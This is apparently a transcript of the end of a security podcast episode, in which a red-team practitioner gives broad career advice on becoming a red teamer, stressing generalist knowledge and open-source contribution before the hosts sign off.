I think a lot of people tend to over-index on vulnerabilities specifically. And let's see what else. If someone were inspired by listening to share all of your stories and wanted to dabble in red teaming or explore that as a career opportunity, as a clear path, perhaps even, what would you recommend that they do? Yeah, that's a great question.

So at Red Tier, I would, so red teamers are very broad. I think they have to be very broad. You have to be generalists. And that's not to say you can't have a specialty, but it is to say that you really need to understand a lot about a lot of different types of systems and like examples of things that you might need to understand.

Everything from social engineering, sending phishing emails, to how the internet works, to how modern software is built, to how to program in different languages, to how to find and exploit application security vulnerabilities, to how IT organizations work in a company and how software makes it its way onto your laptop. You should really thoroughly understand the defender, understand what tools they have to monitor their environment, understand what footprint your activities leave in those tools, understand that there's a human sitting behind that screen looking through thousands of alerts, looking for a reason to say that this is a false positive or something.

And so I think understanding all of those aspects of red teaming is really important. And a good way to do some of that is to work on a lot of different types of security teams. Go try your hand at DNR, at designing some security infrastructure, or even an application developer. Go try to build something and break it.

Also contributing to open source, I think is a really great way to get broad experience. Go find projects like security tools that red teamers use that you're really interested in. Find out how they work, fix bugs, add features that you've always wanted. Those are really good ways to thoroughly understand how the systems that you're attacking tools that you use.

Go look at TruffleHog. It's open source. You should definitely go look at TruffleHog. You should go look at TruffleHog.

You should also go look at Peacemaker, too. It's a nice security tool. All right, awesome. Hey, it's been an absolute pleasure.

This has been a really interesting conversation. Thank you so much. I am filled with gratitude for the time and all of the stories and your sharing your experience. Hey, I've really enjoyed this too, John.

Thanks so much for having me. And thanks for all our listeners out there. And stay tuned next time for another episode of the Security Bondcast in Silicon Valley.